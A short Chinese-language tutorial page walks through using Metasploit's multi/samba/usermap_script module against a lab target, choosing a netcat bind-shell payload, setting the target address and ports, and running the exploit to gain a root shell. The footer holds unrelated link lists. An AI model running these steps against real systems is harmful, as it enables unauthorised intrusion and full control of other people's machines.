Metaspliot 控制终端利用Samba漏洞渗透

 时间:2026-04-22 23:50:54

1、使用命令msfconsole进入终端控制台接口如下:

Metaspliot 控制终端利用Samba漏洞渗透

2、使用search命令从Metasploit渗透代码中找出攻击Samba服务的模块,如下在辅助及渗透攻击模块中,找到针对usermap_script安全漏洞的渗透攻击模块名称为multi/samba/usermap_script。

Metaspliot 控制终端利用Samba漏洞渗透

3、运行use multi/samba/usermap_scrip 命令选择此渗透模块。

Metaspliot 控制终端利用Samba漏洞渗透

4、通过show payloads 查看该渗透攻击模块相兼容的攻击载荷,执行set payload cmd/unix/bind_netcat 选择bind_netcat,通过netcat攻击在渗透攻击成功后执行shell,并通过netcat绑定在一个监听端口。

Metaspliot 控制终端利用Samba漏洞渗透

5、执行show options 查看需要配置那些配置参数,结果显示只需要设置靶机ip地址,RPORT目标端口、LPORT攻击载荷监听端口,以及target目标系统类型可以使用默认设置。

Metaspliot 控制终端利用Samba漏洞渗透

6、输入exploit启动渗透攻击,很快就会提示入侵成功,使用uname -a  whoami命令查看目标主机操作系统类型及拥有用户的账号权限。

Metaspliot 控制终端利用Samba漏洞渗透

7、入侵成功,已获取到靶机操作系统及root控制权限。

  • ubuntu16.04无法打开压缩包解压文件怎么办
  • vm virtualbox无法创建问题解决
  • filezilla无法连接服务器解决方法
  • VMware虚拟机快照的使用
  • VMware文件共享 向虚拟机主机复制文件(一)
  • 热门搜索
    雅生活 生活与健康 丛林肉搏怎么玩 小学家长意见怎么写 如何减少黑色素 去新加坡打工怎么样 房产营业税怎么算 安子齐的古代生活 工作实绩怎么写 夫妻性生活片